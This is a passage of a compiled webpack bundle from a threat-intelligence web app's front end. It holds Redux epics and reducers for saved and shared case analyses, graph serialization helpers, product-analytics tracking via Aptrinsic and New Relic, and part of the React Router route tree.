      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["b" /* DELETE_ANALYSIS_FAILURE */], payload: err }, Object(__WEBPACK_IMPORTED_MODULE_10_modules_alerts_actions_js__["error"])('Case could not be deleted.')]);
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(fetchEpic, fetchSharedEpic, fetchOneEpic, createAnalysisEpic, updateAnalysisEpic, shareAnalysisEpic, deleteAnalysisEpic));

/***/ }),
/* 3437 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ANALYSIS_ENDPOINT; });
var ANALYSIS_ENDPOINT = '/services/constellation/analysis';

/***/ }),
/* 3438 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return hasReportNode; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return analysisToConstellation; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return toJSON; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return fromJSON; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_moment_timezone__ = __webpack_require__(214);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_moment_timezone___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_moment_timezone__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_utils__ = __webpack_require__(5);
var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();





/* Helper for checking if an analysis has a report node */
var hasReportNode = function hasReportNode(graph) {
  return !!graph.get('nodes').filter(function (n) {
    return n.get('type') === 'INCIDENT_REPORT';
  }).size;
};

/**
 * Convert a raw analysis to immutable and make sure all its x/y values are set
 * to its fx/fy values.
 */
var analysisToConstellation = function analysisToConstellation(graph) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(graph).update('nodes', function (nodes) {
    return nodes.map(function (x) {
      return x.set('x', x.get('fx')).set('y', x.get('fy'));
    });
  });
};

var toJSON = function toJSON(analysis, graph) {
  var nodes = graph.get('nodes', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()).map(function (node) {
    return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({
      id: node.get('id'),
      fx: node.get('x'),
      fy: node.get('y'),
      rootNode: node.get('rootNode'),
      nodeType: node.get('nodeType')
    });
  }).toList();
  var edges = graph.get('edges', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()).map(function (edge) {
    return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({
      id: edge.get('id'),
      source: edge.getIn(['source', 'id']),
      target: edge.getIn(['target', 'id'])
    });
  }).toList();

  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])().withMutations(function (x) {
    x.set('title', analysis.get('title'));
    x.set('nodes', nodes);
    x.set('edges', edges);
  });
};

// TODO: Couldn't we simply do something like?
// `https://${window.location.host}/constellation/analysis/${guid}`
// Also, since this is derived data we can probably simplify by not storing it
// on the data record itself.
//
// TODO: None of the other data records in our system (AFAIK) use `guid` let's
// map guid -> id.
var fromJSON = function fromJSON(rawAnalysis) {
  var analysis = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(rawAnalysis);
  var guid = analysis.get('guid');
  var serverName = window.location.hostname;
  var shareableLink = 'https://station.trustar.co/constellation/analysis/' + guid;

  if (serverName.indexOf('localhost') >= 0 || serverName.indexOf('staging') >= 0) {
    shareableLink = 'https://staging.trustar.co/constellation/analysis/' + guid;
  } else if (serverName.indexOf('demo') >= 0) {
    shareableLink = 'https://demo.trustar.co/constellation/analysis/' + guid;
  }

  return analysis.mapEntries(function (_ref) {
    var _ref2 = _slicedToArray(_ref, 2),
        k = _ref2[0],
        v = _ref2[1];

    switch (k) {
      case 'created':
      case 'updated':
        return [k, __WEBPACK_IMPORTED_MODULE_1_moment_timezone___default()(v)];
      case 'nodes':
      case 'edges':
        return [k, Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()]; // Why an _empty_ list?
      case 'sharedWith':
        var emails = v.map(function (x) {
          return Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["isObject"])(x) ? x.get('email') : x;
        });
        return [k, emails.join(', ')];
      case 'createdBy':
      case 'updatedBy':
        return null;
      case 'user':
        return Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["isObject"])(v) ? [k, v.get('email')] : [k, v];
      default:
        return [k, v];
    }
  }).set('url', shareableLink);
};

/***/ }),
/* 3439 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "analyses", function() { return analyses; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "analysesMeta", function() { return analysesMeta; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(372);






var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(list).filter(function (x) {
    return x.get('guid');
  }) // Filter out anything without a guid
  .toOrderedMap().mapKeys(function (k, v) {
    return v.get('guid');
  });
};

var saved = function saved() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["f" /* FETCH_ANALYSES_SUCCESS */]:
      return listToOrderedMap(payload); // NOTE: Do we want to completely overwrite state here?
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["n" /* SAVE_ANALYSIS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["v" /* UPDATE_ANALYSIS_SUCCESS */]:
      return state.set(payload.get('guid'), payload);
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* DELETE_ANALYSIS_SUCCESS */]:
      return state.delete(payload);
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["r" /* SHARE_ANALYSIS_SUCCESS */]:
      return state.setIn([payload.guid, 'sharedWith'], payload.sharedWith);
    default:
      return state;
  }
};

var shared = function shared() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["k" /* FETCH_SHARED_ANALYSES_SUCCESS */]:
      return listToOrderedMap(payload); // NOTE: Do we want to completely overwrite state here?
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["s" /* STORE_ANALYSIS */]:
      return state.set(payload.get('guid'), payload);
    default:
      return state;
  }
};

var filters = function filters() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(['saved', 'shared']);
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["o" /* SET_DISPLAY_OPTIONS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(payload);
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["g" /* FETCH_ANALYSIS */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["i" /* FETCH_ANALYSIS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["h" /* FETCH_ANALYSIS_FAILURE */]:
      return false;
    default:
      return state;
  }
};

var analyses = Object(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__["combineReducers"])({
  saved: saved,
  shared: shared
});

var analysesMeta = Object(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__["combineReducers"])({
  filters: filters,
  loading: loading
});

/***/ }),
/* 3440 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return epic; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__profile_action_types_js__ = __webpack_require__(116);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__profile_getters_js__ = __webpack_require__(142);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__users_action_types_js__ = __webpack_require__(517);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_6_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_search_action_types_js__ = __webpack_require__(284);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_modules_reports_action_types_js__ = __webpack_require__(92);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__constants_js__ = __webpack_require__(1322);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__constellation_action_types_js__ = __webpack_require__(143);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__marketplace_action_types_js__ = __webpack_require__(506);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12__profile_action_types__ = __webpack_require__(116);
var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();

/* globals aptrinsic,ga */






var debug = __WEBPACK_IMPORTED_MODULE_5_debug___default()('app:modules:tracking'); // eslint-disable-line no-unused-vars









var newrelic = window.newrelic;

var getRateLimitByProfile = Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["tryCatch"])(
// $FlowIgnore: prop can take a number
Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["pipe"])(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])('company'), Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])('requestQuotas'), Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])(0), Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])('maxRequests')), function () {
  return -1;
});

var getSharingGroupsByProfile = Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["tryCatch"])(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["pipe"])(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])('company'), Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])('sharingGroups'), Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["map"])(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])('name')), Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["join"])(', ')), function () {
  return null;
});

var profileTrackingEpic = function profileTrackingEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_0__profile_action_types_js__["f" /* FETCH_SUCCESS */]).do(function (_ref) {
    var payload = _ref.payload;

    debug('Initializing Aptrinsic for user:', payload);
    try {
      var trackedUser = {
        id: payload.guid,
        email: payload.email,
        isTrialCompany: payload.company.trialCompany,
        rateLimit: getRateLimitByProfile(payload),
        enclaveInboxLimit: payload.company.maxIngestEmailsCount,
        firstVisitDate: payload.activationDate
      };
      var trackedAccount = {
        id: payload.company.guid,
        name: payload.company.name
      };

      // $FlowIgnore: browser global, nothing to worry about here
      aptrinsic('identify', trackedUser, trackedAccount);
      debug('Initialized Aptrinsic user and account', trackedUser, trackedAccount);
    } catch (err) {
      debug('Aptrinsic user could not be initialized. Adblocker?', payload, err);
    }
  }).do(function (_ref2) {
    var payload = _ref2.payload;

    debug('Initializing New Relic for user:', payload);
    try {
      newrelic.setCustomAttribute('userGuid', payload.guid);

      debug('Initialized New Relic user and account', payload.email);
    } catch (err) {
      debug('New Relic user could not be initialized. Adblocker?', payload, err);
    }
  }).ignoreElements();
};

var searchTrackingEpic = function searchTrackingEpic(action$) {
  return __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].zip(action$.ofType(__WEBPACK_IMPORTED_MODULE_7_modules_search_action_types_js__["l" /* FETCH_REPORTS_SUCCESS */]), action$.ofType(__WEBPACK_IMPORTED_MODULE_7_modules_search_action_types_js__["i" /* FETCH_IOCS_SUCCESS */]))

  // $FlowIgnore: Ramda + Rxjs types are not cooperating...
  .map(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["map"])(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["pipe"])(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])('payload'), Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])('data')))).do(function (x) {
    var _x = _slicedToArray(x, 2),
        reports = _x[0],
        iocs = _x[1];

    var total = 0;

    try {
      total = reports.size + iocs.size;
    } catch (err) {
      debug('Error calculating total ioc and report results from search', err);
    } finally {
      // $FlowIgnore: browser global, nothing to worry about here
      aptrinsic('track', 'Search Results', { 'Results Count': total });
    }
  }).ignoreElements();
};

/**
 * Track "hover" events (we're actually tracking mouseover events). Any element
 * with data-selector will be tracked.
 *
 * NOTE: Ideally this would also track mouseout so that we only fire an event if
 * the mouse remains over an element for some threshold of time.
 */
var hoverEventEpic = function hoverEventEpic(action$) {
  return __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].defer(function () {
    return __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].fromEvent(document.body, 'mouseover');
  }).filter(function (e) {
    return e.target && e.target.dataset.selector;
  }) // Only capture events where the el has [data-selector] set
  .map(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])('target')).debounceTime(200) // Meant to help with noise while moving mouse over multiple elements
  .do(function (el) {
    try {
      // $FlowIgnore: We're in a try catch...
      var selector = el.dataset.selector;
      var hoverId = 'hover:' + selector;

      // $FlowIgnore: browser global, nothing to worry about here
      aptrinsic('track', 'intent', { intentId: hoverId, date: new Date().toISOString() });
      debug('Tracked hover', hoverId);
    } catch (err) {
      debug('Error tracking hover. Adblocker?', err, el);
    }
  }).ignoreElements();
};

/**
 * Captures a click event on IOC from within our constellation graphs or the IOC page in explore.
 */
var iocClickedEpic = function iocClickedEpic(action$) {
  var iocNodeClick = action$.ofType(__WEBPACK_IMPORTED_MODULE_10__constellation_action_types_js__["v" /* NODE_CLICKED */]).map(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])('payload')).filter(function (nodeData) {
    return !!nodeData && !!nodeData.type && !!nodeData.value;
  }).map(function (node) {
    return {
      value: node.value,
      type: node.type,
      priorityLevel: node.priorityLevel,
      clickSource: 'Constellation graph'
    };
  });

  var reportOrIocOpened = action$.ofType(__WEBPACK_IMPORTED_MODULE_10__constellation_action_types_js__["r" /* FETCH_SUCCESS */]).map(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["path"])(['payload', 'data', 'nodes'])).map(function (nodes) {
    return nodes.find(function (node) {
      return node.rootNode;
    });
  }).filter(function (nodeData) {
    return !!nodeData && !!nodeData.type && !!nodeData.value;
  }).map(function (node) {
    return {
      value: node.value,
      type: node.type,
      priorityLevel: node.priorityLevel,
      clickSource: 'IOC Explore Table or Search'
    };
  });

  return __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].merge(iocNodeClick, reportOrIocOpened).do(function (clickData) {
    // $FlowIgnore: browser global, nothing to worry about here
    aptrinsic('track', 'Indicator Clicked', { 'Node Data': clickData });
  }).ignoreElements().catch(function (err, source) {
    debug('Error tracking high priority node click', err);
    return __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].throw(err);
  });
};

/* Register the action of clicking on an IOC on the APM endpoint */
var apmIndicatorActivityEpic = function apmIndicatorActivityEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;


  var iocNodeClicked = action$.ofType(__WEBPACK_IMPORTED_MODULE_10__constellation_action_types_js__["v" /* NODE_CLICKED */]).map(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])('payload')).distinctUntilChanged(function (x, y) {
    return x.guid === y.guid;
  }).filter(function (payload) {
    return !!payload && !!payload.type && !!payload.value;
  }).map(function (node) {
    return {
      eventType: __WEBPACK_IMPORTED_MODULE_9__constants_js__["a" /* APM_EVENT_TYPE */],
      value: node.value,
      type: node.type,
      priorityLevel: node.priorityLevel,
      clickSource: 'Constellation graph'
    };
  });

  var reportOrIocOpened = action$.ofType(__WEBPACK_IMPORTED_MODULE_10__constellation_action_types_js__["r" /* FETCH_SUCCESS */]).map(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["path"])(['payload', 'data', 'nodes'])).map(function (nodes) {
    return nodes.find(function (node) {
      return node.rootNode;
    });
  }).filter(function (nodes) {
    return !!nodes && !!nodes.type && !!nodes.value;
  }).map(function (node) {
    return {
      eventType: __WEBPACK_IMPORTED_MODULE_9__constants_js__["a" /* APM_EVENT_TYPE */],
      value: node.value,
      type: node.type,
      priorityLevel: node.priorityLevel,
      clickSource: 'IOC Explore Table or Search'
    };
  });

  return __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].merge(iocNodeClicked, reportOrIocOpened).distinctUntilChanged(function (x, y) {
    return x.value === y.value;
  }).throttleTime(500).mergeMap(function (nodeData) {
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_9__constants_js__["b" /* REGISTER_APM_ENDPOINT */], nodeData).ignoreElements().catch(function (err, source) {
      debug('Error tracking indicator node click', err);
      return __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].throw(err);
    });
  });
};

/* Records the marketplace query on the BE */
var apmMarketplaceActivityEpic = function apmMarketplaceActivityEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_11__marketplace_action_types_js__["a" /* REGISTER_ACTIVITY */]).mergeMap(function (_ref5) {
    var payload = _ref5.payload;

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_9__constants_js__["b" /* REGISTER_APM_ENDPOINT */], __WEBPACK_IMPORTED_MODULE_9__constants_js__["c" /* marketplaceApmParams */]).ignoreElements().catch(function (err, source) {
      debug('Error tracking marketplace tab click', err);
      return __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].throw(err);
    });
  });
};

var reportFailureEpic = function reportFailureEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8_modules_reports_action_types_js__["O" /* STORE_FAILURE */]).throttleTime(200) // See NOTE
  .map(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])('payload')).map(Object(__WEBPACK_IMPORTED_MODULE_6_ramda__["prop"])('request')).map(function (req) {
    return {
      status: req.status,
      req: req.method + ' ' + req.url
    };
  }).do(function (x) {
    // $FlowIgnore: browser global, nothing to worry about here
    aptrinsic('track', 'Fetch Report Failure', x);
  }).ignoreElements().catch(function (err, source) {
    debug('Error tracking report fetch failure', err);
    return __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].throw(err);
  });
};

// Disabled until we want to handle locked content differently
var lockedContentClickEpic = function lockedContentClickEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_12__profile_action_types__["h" /* PREMIUM_CONTENT_LOCK_CLICK */]).map(function (_ref6) {
    var payload = _ref6.payload;

    // $FlowIgnore: browser global, nothing to worry about here
    aptrinsic('track', 'Premium locked content clicked', { payload: payload });
    return __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].empty();
  }).catch(function (err) {
    debug('Error tracking locked content click', err);
    return __WEBPACK_IMPORTED_MODULE_3_rxjs__["Observable"].throw(err);
  });
};

var epic = Object(__WEBPACK_IMPORTED_MODULE_4_redux_observable__["combineEpics"])(searchTrackingEpic, profileTrackingEpic, hoverEventEpic, iocClickedEpic, reportFailureEpic, apmIndicatorActivityEpic, apmMarketplaceActivityEpic);

/***/ }),
/* 3441 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_router__ = __webpack_require__(98);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__components_App_js__ = __webpack_require__(3442);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__components_ConnectedDesignProvider__ = __webpack_require__(563);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__BundleCreator__ = __webpack_require__(3679);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_containers_features__ = __webpack_require__(876);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_features__ = __webpack_require__(181);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





/**
 * NOTE: App should not be lazy-loaded. It is the root UI component and lazy
 * loading seems to break when trying to load it. Perhaps it's react router and
 * something to do with this being the root route.  Either way, lazy loading all
 * _other_ components already provides a big win.
 */




/* Import Bundled Components */





var makeRoutes = function makeRoutes() {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    __WEBPACK_IMPORTED_MODULE_2_react_router__["Route"],
    { path: '/' },
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["IndexRedirect"], { to: '/browse/reports' }),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Redirect"], { from: '*.html', to: '/' }),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      __WEBPACK_IMPORTED_MODULE_2_react_router__["Route"],
      { component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["n" /* EnsureLogin */] },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        __WEBPACK_IMPORTED_MODULE_2_react_router__["Route"],
        { component: __WEBPACK_IMPORTED_MODULE_3__components_App_js__["a" /* default */] },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Redirect"], { from: 'reports', to: '/browse/reports' }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Redirect"], { from: 'constellation', to: '/browse/reports' }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Redirect"], { from: 'reports/:id', to: '/constellation/reports/:id' }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], {
          path: 'constellation/:viewType/:id',
          component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["g" /* ConstellationContainerV2 */]
        }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          __WEBPACK_IMPORTED_MODULE_2_react_router__["Route"],
          { component: __WEBPACK_IMPORTED_MODULE_4__components_ConnectedDesignProvider__["a" /* default */] },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'error', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["p" /* ErrorView */] }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
            __WEBPACK_IMPORTED_MODULE_2_react_router__["Route"],
            { path: 'browse' },
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["IndexRedirect"], { to: 'reports' }),
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'iocs', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["o" /* EntitiesBrowser */] }),
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'reports', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["E" /* ReportBrowser */] }),
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], {
              path: 'cases',
              component: __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_containers_features__["c" /* ToggleFeatureView */],
              toggledComponent: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["d" /* CaseBrowser */],
              untoggledComponent: __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_containers_features__["a" /* FeatureNotEnabledView */],
              feature: __WEBPACK_IMPORTED_MODULE_7_modules_features__["c" /* flags */].CASES_VIEW_ENABLED,
              match: __WEBPACK_IMPORTED_MODULE_7_modules_features__["e" /* treatments */].ON
            }),
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'search', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["H" /* SearchBrowser */] }),
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], { path: 'marketplace', component: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["w" /* MarketplaceContainer */] }),
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Redirect"], { from: 'tours', to: 'reports' })
          )
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_2_react_router__["Route"], {
          path: 'phishing',
          component: __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_containers_features__["c" /* ToggleFeatureView */],
          toggledComponent: __WEBPACK_IMPORTED_MODULE_5__BundleCreator__["B" /* PhishingView */],
          untoggledComponent: __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_containers_features__["a" /* FeatureNotEnabledView */],
          feature: __WEBPACK_IMPORTED_MODULE_7_modules_features__["c" /* flags */].PHISHING_TRIAGE_ENABLED,
          match: __WEBPACK_IMPORTED_MODULE_7_modules_features__["e" /* treatments */].ON
        }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          __WEBPACK_IMPORTED_MODULE_2_react_router__["Route"],
